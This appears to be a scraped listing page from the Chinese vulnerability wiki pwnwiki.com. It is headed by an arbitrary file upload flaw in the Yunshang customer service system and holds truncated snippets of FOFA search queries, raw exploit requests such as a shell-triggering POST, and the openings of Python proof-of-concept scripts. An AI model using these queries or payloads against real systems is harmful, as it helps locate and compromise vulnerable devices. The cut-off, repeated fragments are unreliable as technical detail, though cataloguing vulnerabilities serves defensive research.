云尚在线客服系统任意文件上传漏洞
PWNWIK.COM , FOFA body="cgwl.ico" 漏洞利用 访问 /index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1& ...
PWNWIK.COM , FOFA body="cgwl.ico" 漏洞利用 访问 /index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1& ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Contents 1 FOFA 2 Request 3 POC 4 参考 FOFA title="锐捷网络 --NBR路由器--登录界面" Request POST /WEB_V ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , 漏洞利用 发送以下请求: POST /login.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length ...
免费、自由、人人可编辑的漏洞库 , 漏洞利用 发送以下请求: POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Co ...
免费、自由、人人可编辑的漏洞库 , POC python3 poc.py http://ip:port import sys,requests def main(ip): url = "{ip}/a.css/../user/getUserL ...
免费、自由、人人可编辑的漏洞库 , POC POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ... ----------------------------- ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , FOFA "/seller.php?s=/Public/login" Request POST /Common/ckeditor/plugins/multiimg/dialogs ...
免费、自由、人人可编辑的漏洞库 , EXP # !/usr/bin/python3 # -*- coding:utf-8 -*- # author: Forthrglory import requests import time def g ...
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp存在未授权访问。 POC import base64 import requests import ast def req(url): headers ...
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp 存在未授权访问 POC import base64 import requests import ast def req(url): headers ...